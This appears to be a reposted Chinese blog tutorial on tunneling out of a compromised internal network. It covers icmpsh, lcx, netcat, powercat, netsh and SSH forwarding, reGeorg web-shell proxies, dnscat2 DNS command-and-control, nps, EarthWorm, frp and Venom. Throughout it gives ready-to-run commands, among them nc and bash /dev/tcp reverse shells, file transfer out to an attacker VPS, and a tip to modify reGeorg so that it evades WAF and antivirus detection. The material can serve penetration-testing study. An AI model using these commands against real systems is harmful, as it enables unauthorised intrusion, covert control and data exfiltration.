赞
踩
当我们拿到一台内网主机后,一般都是有区域隔离的。
所以内网隧道技术,就是我们必须要掌握的。
我简单介绍一下建立通信隧道,常见的有端口转发等
主要隧道有:
ICMP TCP UDP
SSH HTTP DNS
SOCKS
icmp协议:
ping 命令
ping www.baidu.com
TCP协议:
curl www.baidu.com
nc IP
HTTP协议:
curl ip:port
curl www.baidu.com:80
DNS协议:
Nslookup www.baidu.com
Dig www.baidu.com
ICMP(Internet Control Message Protocol):没有目的端口与源端口,属于Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。
icmp隧道常用攻击:icmpsh、PRISM
icmpsh
环境说明:跨平台、不需要管理员运行
有三台机器: VPS–边界机–内网机
VPS操作过程:
下载icmpsh
安装依赖
服务端禁用:
icmp respones sysctl -w net.ipv4.icmp_echo_ignore_all=1
运行程序 :
./run.sh
输入目标主机IP地址 开启监听:
./icmpsh_m,py vpsip 边界出网的公网IP
在边界机执行:
Imp.exe -t 攻击机ip -d 500 -b 30 -s 128
还有一种方法
编译 gcc icmpsh-m.c
VPS开启监听: sudo ./a.out
内网边界主机:icmpsh.exe -t VPSip -d 500 -b 30 -s 128
内网端口转发
老工具了也是
目标主机:
lcx.exe -slave vpsip 4444 127.0.0.1 3389
VPS:
Lcx --listen 4444 5555
nc 是一款比较老的工具,但是确实是经典俗称瑞士军刀,简单介绍一下
简单互相传输功能:
vps:
nc -lp 5555
目标机器:
Nc -vn vpsip 5555
文件传输功能:
vps:
nc -lp 5555 >1.txt
目标机器:
Nc -vn vpsip < xx.txt
shell的反弹:
正向连接:
nc -lvp 4444 -e /bin/sh
nc 192.168.1.1 4444
反向连接:
nc -lvp 4444
nc 192.168.1.1 4444 -e /bin/sh
注意:windows版本CMD位置
C:\windows\system32\cmd.exe
Bash反向shell
nc -lvp 4444
Bash -i >& /dev/tcp/192.168.1.1/4444 0>&1
正向和反向连接:
powercat -l -p 8080 -e cmd.exe -v
nc 192.168.1.1 8080 -vv
nc -l -p 8080 -vv
powercat -c 192.169.1.1 -p 8080 -e cmd.exe -v
可以反弹powershell
-eq
文件上传
这个不用说,基本这种连接的都支持
在c:
下新建一个test.txt
的文件,写入数据
在有text.txt
的机器执行:
powercat -c 192.168.12.108 -p 9999 -i c:test.txt -v
另一台机器执行
powercat -l -p 9999 -of c:test.txt -v
netsh仅支持TCP协议, 适用于双网卡服务器
查看系统防火墙状态 netsh firewall show state 查看现有规则 netsh interface portproxy show all 添加转发规则 listenaddress – 等待连接的本地IP地址 listenport – 本地侦听TCP端口 connectaddress – 将传入连接重定向到本地或远程IP地址(或DNS名称) netsh interface portproxy set v4tov4 listenaddress=边界机 listenport=6666 connectaddress=内网IP connectport=3389 #连接边界机6666端口,就是连接到内网目标上面的3389 使用netstat确保6666端口当前处于被侦听状态: netstat -ano 删除转发规则 netsh interface portproxy delete v4tov4 listenport=6666
一个正常的SSH命令
ssh root@192.168.1.1
拓扑:
VPS----边界WEB----目标主机
边界WEB双网卡192.168.1.1和10.1.1.1段
本地转发机制:
选项:
-C 压缩传输
-f 后台启用
-N 不打开远程shell,处于等待状态
-g 允许本地转发端口
使用方法:
在VPS上运行
ssh -CfNg -L <vps port>:<目标主机 host>:<目标主机 port> <SSH 边界机>
ssh -CfNg -l 5555:10.1.1.1:3389 root@192.168.1.1
#VPS检查---查看端口是否已经连接
netstat -tulnp | grep "5555"
当访问 VPS 5555 端口的时候,就转发给 root@192.168.1.1 边界机 ,发送给目标主机
拓扑:
VPS----边界WEB----目标主机
边界WEB----目标主机—都是单网卡,都是纯内网 10.1.1.1段
在WEB边界机运行
ssh -CfNg -R <vps port>:<目标主机 host>:<目标主机 port> <SSH VPS主机>
ssh -CfNg -l 6666:10.1.1.1:3389 root@49.121.1.102
边界机把内网的端口,远程连接道VPS,远程转发道VPS
这里主要是建立一个动态的socks代理隧道
在VPS上运行
ssh -CfNg -D 7000 <SSH 边界主机>
ssh -CfNg -D 7000 root@192.168.1.1
VPS上7000端口上,开了一个socks代理,用代理软件就可以连接
将对应的脚本文件上传到目标服务器,根据不同的网站类型php jsp asp等,上传对应的脚本 reGeorg.php
攻击机(VPS)运行:
python reGeorgSocksProxy.py -l 46.46.46.46(VPS的IP) -p 666(VPS端口) -u http://(目标服务器IP)/reGeorg.php
然后在本地通过代理工具链接本地的666,就是链接好隧道了
注意:这个查杀比较严重,建议会免杀的修改修改。
非常遗憾的是,目前大部分WAF
都会针对默认原装版本的reGeorg
。(可以自己修改后使用)
2.Neo-reGeorg
这里推荐用 Neo-reGeorg 这个也不错,是重构reGeorg 的一个作品
https://github.com/L-codes/Neo-reGeorg
用法类似:
VPS上支持生成的服务端,默认 GET 请求响应指定的页面内容 (如伪装的404页面)
$ python neoreg.py generate -k <you_password> --file 404.html
将相应的隧道文件放到目标服务器的web目录后使用neoreg连接web服务器并建立本地socks代理。
VPS上运行
$ python neoreg.py -k <you_password> -u <server_url> --proxy socks5://10.1.1.1:8080(本地代理地址)
Socks连接工具连接本地127.0.0.1:1080
dnscat2
工具dnscat2,这是一DNS隧道,该工具旨在通过DNS协议创建加密的命令和控制(C&C)通道,还有自己的控制台
dnscat2分为两个部分:客户端和服务器。
服务端为Ruby
编写,需安装Ruby环境。kali系统内置Ruby,但是运行时仍可能报缺少一些gem依赖:
服务端VPS:
安装依赖:
apt install gem
apt install ruby-dev
apt install libpq-dev
apt install ruby-bundler
下载并安装:
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
sudo gem install bundler
开启服务:
ruby ./dnscat2.rb vpn.zeo.com -e open
目标主机客户端:
上传dnsClient.zip 到目标主机 解压
./dnscat --dns server=服务端ip,port=53 --secret=服务端生成的秘钥
直连模式使用方法:
VPS中 server路径下:
ruby ./dnscat2
客户端:(这个命令会在 上面服务启动后提示,可以参考下面的截图红框)
./dnscat --dns server=x.x.x.x,port=53 --secret=281fc7a7ec57d500d269c96b8ae36ba5
常用命令:
window -i 1 进入交互
exec -c "ping baidu.com" 执行命令, 无回显
shell 返回一个半交互shell,会有一个id,记录此id
ctrl+Z 返回
下面基本上都是可以支持多种协议,之介绍scoks的情况,大家可以自己查看使用方法
也推荐使用这些工具
nps: https://github.com/ehang-io/nps
**ew:**https://github.com/idlefire/ew
frp: https://github.com/fatedier/frp
nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。
(https://github.com/ehang-io/nps)
优点:
环境说明:
kali边界机: 192.168.5.123 192.168.3.2
kali2: 192.168.5.128 攻击者vps机器
win7:192.168.3.99 内网机器
1 启动服务端
vim ./conf/nps.conf
cd ..
./nps. #启动服务
在服务端配置conf/nps.conf文件,修改用户名密码,端口号后启动服务,最好不要和已有的端口冲突
默认端口
nps默认配置文件使用了80,443,8080,8024端口
80与443端口为域名解析模式默认端口
8080为web管理访问端口
8024为网桥端口,用于客户端与服务器通信
以上都可以在服务端配置conf/nps.conf 自行修改
直接访问自己设计的web端口 http://IP:8081/login/index
友好的操作界面!
2 新增一个客户端,在配置中填写socks代理的密码
3 记住唯一验证密钥和ID,连接使用
4 客户端连接,上传npc到边界机
npc.exe -server=服务端ip:8024 -vkey=生成的vkey -type=tcp
成功上线,点击隧道配置代理
新建隧道,协议很全
这个界面十分友好,就不继续介绍,基本看一眼就会用了。
EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,可以用于多层的内网穿透
多层内网穿透可以去GitHub查找
VPS开启监听:
./ew_for_linux64 -s rcsocks -l 1080 -e 1024
边界机执行:
ew_for_Win.exe -s rssocks -d 攻击Ip -e 1024
多层内网二层网络,A无外网 IP–vps 流量转发 +B 正向代理 +A作为跳板端口绑定
VPS–边界机(可以出网)–内网机(目标网络内部主机,无法访问公网)
VPS:
./ew -s lcx_listen -l 1080 -e 8888
边界机器:
ew -s lcx_slave -d VPS_IP -e 666 -f 内网主机 -g 9999
内网:
ew -s sscoksd -l 9999
VPS将1080的代理请求转发到8888
在边界机上,通过工具的 lcx_slave 方式,打通VPS:8888 和 内网机:9999 之间的通讯隧道
在内网主机上利用 ssocksd 方式启动 9999 代理
我们是可通过访问VPS:1080 来使用内网主机提供的 socks5 代理
将 frps 及 frps.ini 放到具有公网 IP 的机器上。
将 frpc 及 frpc.ini 放到处于内网环境的机器上。
首先在vps上启动frp服务端,开启一个端口,默认是7000:
./frps -c frps.ini
再配置frp的客户端:
[common]
server_addr = x.x.x.x
server_port = 7000
[socks5]
type = tcp
remote_port = 8881
plugin = socks5
plugin_user = root
plugin_passwd = root
use_encryption = true
use_compression = true
注意:上面的配置了用户名密码 root root 代理的时候注意要加上
最后两个配置是
use_encryption = true \\启用加密
use_compression = true \\启用压缩
启动 frpc:
frpc.exe -c ./frpc.ini
最后,使用代理软件连接服务端的8881建立连接
Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具
admin节点和agent节点均可监听连接也可发起连接,可以互相的连接。
admin监听端口,agent发起连接:
./admin_linux_x64 -lport 8838
agent.exe -rhost VPS_IP -rport 8838
连接成功后出现交互界面 admin node help一下看到功能
help Help information.
exit Exit.
show Display network topology.
getdes View description of the target node.
setdes [info] Add a description to the target node.
goto [id] Select id as the target node.
listen [lport] Listen on a port on the target node.
connect [rhost] [rport] Connect to a new node through the target node.
sshconnect [user@ip:port] [dport] Connect to a new node through ssh tunnel.
shell Start an interactive shell on the target node.
upload [local_file] [remote_file] Upload files to the target node.
download [remote_file] [local_file] Download files from the target node.
socks [lport] Start a socks5 server.
lforward [lhost] [sport] [dport] Forward a local sport to a remote dport.
rforward [rhost] [sport] [dport] Forward a remote sport to a local dport.
先show 看下拓扑
goto 1 #选择目标1
socks 8886 #在vps上 8886端口上开启代理
有意思的是这个还能出一个shell,也挺方便
内网穿透的东西还是比较重要的,内网断网机常常都得用隧道,所以小结一下,选择的时候最好要有较好的稳定性,支持多种协议,流量可加密,推荐使用最后推荐的几种工具,如果只是端口转发推荐netsh和SSH转发较为稳定。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。